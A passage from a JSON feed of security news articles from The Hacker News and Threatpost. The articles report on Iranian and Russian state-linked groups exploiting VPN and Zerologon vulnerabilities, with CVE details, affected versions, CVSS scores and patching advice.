be a ransomware attack revealed new variants of wipers that were deployed in a set of destructive attacks against Israeli targets,\" the researchers [said](<https://assets.sentinelone.com/sentinellabs/evol-agrius>). \"The operators behind the attacks intentionally masked their activity as ransomware attacks, an uncommon behavior for financially motivated groups.\"\n\nThe group's modus operandi involves deploying a custom .NET malware called Apostle that has evolved to become a fully functional ransomware, supplanting its prior wiper capabilities, while some of the attacks have been carried out using a second wiper named DEADWOOD (aka Detbosit) after a logic flaw in early versions of Apostle prevented data from being erased.\n\nIn addition, the Agrius actors drop a .NET implant called IPsec Helper that can be used to exfiltrate data or deploy additional malware. What's more, the threat actor's tactics have also witnessed a shift from espionage to demanding ransoms from its victims to recover access to encrypted data, only to have them actually destroyed in a wiping attack.\n\n[](<https://thehackernews.com/images/-bw6vJJdJmK8/YK5m41wm5XI/AAAAAAAACpM/hW2cbdRji0Qr191iBSXgSHzTAfh_i9ERwCLcBGAsYHQ/s0/vpn.jpg>)\n\nBesides using ProtonVPN for anonymization, the Agrius attack cycle leverages 1-day vulnerabilities in web-based applications, including [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>), to gain an initial foothold and subsequently deliver ASPXSpy web shells to maintain remote access to compromised systems and run arbitrary commands.\n\nIf anything, the research adds to evidence that state-sponsored actors with ties to the Iranian government are increasingly looking at ransomware operations as a subterfuge technique to mimic other financially motivated cybercriminal ransomware groups.\n\nRecently leaked documents by Lab Dookhtegan revealed an initiative called \"[Project Signal](<https://thehackernews.com/2021/05/researchers-uncover-iranian-state.html>)'' that linked Iran's Islamic Revolutionary Guard Corps to a ransomware operation through a contracting company.\n\n\"While being disruptive and effective, ransomware activities provide deniability, allowing states to send a message without taking direct blame,\" the researchers said. \"Similar strategies have been used with devastating effect by [other nation-state sponsored actors](<https://thehackernews.com/2017/06/petya-ransomware-decryption-key.html>).\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-26T15:30:00", "type": "thn", "title": "Data Wiper Malware Disguised As Ransomware Targets Israeli Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2021-06-07T05:01:48", "id": "THN:EAEDDF531EB90375B350E1580DE3DD02", "href": "https://thehackernews.com/2021/05/data-wiper-malware-disguised-as.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "threatpost": [{"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-01T21:47:35", "description": "An APT group known as Pioneer Kitten, linked to Iran, has been spotted selling corporate-network credentials on hacker forums. The credentials would let other cybercriminal groups and APTs perform cyberespionage and other nefarious cyber-activity.\n\nPioneer Kitten is a hacker group that specializes in infiltrating corporate networks using open-source tools to compromise remote external services. Researchers observed an actor associated with the group advertising access to compromised networks on an underground forum in July, according to a [blog post](<https://www.crowdstrike.com/blog/who-is-pioneer-kitten/>) Monday from Alex Orleans, a senior intelligence analyst at CrowdStrike Intelligence.\n\nPioneer Kitten\u2019s work is related to other groups either sponsored or run by the Iranian government, which [were previously seen](<https://www.zdnet.com/article/iranian-hackers-have-been-hacking-vpn-servers-to-plant-backdoors-in-companies-around-the-world/>) hacking VPNs and planting backdoors in companies around the world.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIndeed, the credential sales on hacker forums seem to suggest \u201ca potential attempt at revenue stream diversification\u201d to complement \u201cits targeted intrusions in support of the Iranian government,\u201d Orleans wrote. However, Pioneer Kitten, which has been around since 2017, does not appear to be directly operated by the Iranian government but is rather sympathetic to the regime and likely a private contractor, Orleans noted.\n\nPioneer Kitten\u2019s chief mode of operations is its reliance on SSH tunneling, using open-source tools such as Ngrok and a custom tool called SSHMinion, he wrote. The group uses these tools to communicate \u201cwith implants and hands-on-keyboard activity via Remote Desktop Protocol (RDP)\u201d to exploit vulnerabilities in VPNs and network appliances to do its dirty work, Orleans explained.\n\nCrowdStrike observed the group leveraging several critical exploits in particular \u2014 [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and most recently, [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>). All three are exploits affect VPNs and networking equipment, including Pulse Secure \u201cConnect\u201d enterprise VPNs, Citrix servers and network gateways, and F5 Networks BIG-IP load balancers, respectively.\n\nPioneer Kitten\u2019s targets are North American and Israeli organizations in various sectors that represent some type of intelligence interest to the Iranian government, according to CrowdStrike. Target sectors run the gamut and include technology, government, defense, healthcare, aviation, media, academic, engineering, consulting and professional services, chemical, manufacturing, financial services, insurance and retail.\n\nWhile not as well-known or widespread in its activity as other nation-state threats such as China and Russia, Iran has emerged in recent years as a formidable cyber-enemy, amassing a number of APTs to mount attacks on its political adversaries.\n\nOf these, Charming Kitten\u2014which also goes by the names APT35, Ajax or Phosphorus\u2014appears to be the most active and dangerous, while others bearing similar names seem to be spin-offs or support groups. Iran overall appears to be ramping up its cyber-activity lately. CrowdStrike\u2019s report actually comes on the heels of news that Charming Kitten also has [resurfaced recently. ](<https://threatpost.com/charming-kitten-whatsapp-linkedin-effort/158813/>)A new campaign is using LinkedIn and WhatsApp to convince targets \u2014 including Israeli university scholars and U.S. government employees \u2014 to click on a malicious link that can steal credentials.\n\nOperating since 2014, Charming Kitten is known for politically motivated and socially engineered attacks, and often uses phishing as its attack of choice. Targets of the APT, which uses clever social engineering to snare victims, have been [email accounts](<https://threatpost.com/iran-linked-hackers-target-trump-2020-campaign-microsoft-says/148931/>) tied to the Trump 2020 re-election campaign and [public figures and human-rights activists](<https://threatpost.com/charming-kitten-uses-fake-interview-requests-to-target-public-figures/152628/>), among others.\n\n**[On Wed Sept. 16 @ 2 PM ET:](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>) Learn the secrets to running a successful Bug Bounty Program. [Register today](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) for this FREE Threatpost webinar \u201c[Five Essentials for Running a Successful Bug Bounty Program](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this [LIVE](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>) webinar.**\n", "cvss3": {}, "published": "2020-09-01T13:35:19", "type": "threatpost", "title": "Pioneer Kitten APT Sells Corporate Network Access", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902"], "modified": "2020-09-01T13:35:19", "id": "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "href": "https://threatpost.com/pioneer-kitten-apt-sells-corporate-network-access/158833/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n[](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>)\n\nClick to Register!\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warned of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). [Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on** **[Github.](<https://github.com/dirkjanm/CVE-2020-1472>) This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 2.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n\n** [On October 14 at 2 PM ET](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) Get the latest information on the rising threats to retail e-commerce security and how to stop them. [Register today](<https://threatpost.com/webinars/retail-security-magecart-and-the-rise-of-retail-security-threats/?utm_source=ART&utm_medium=ART&utm_campaign=oct_webinar>) for this FREE Threatpost webinar, \u201c[Retail Security: Magecart and the Rise of e-Commerce 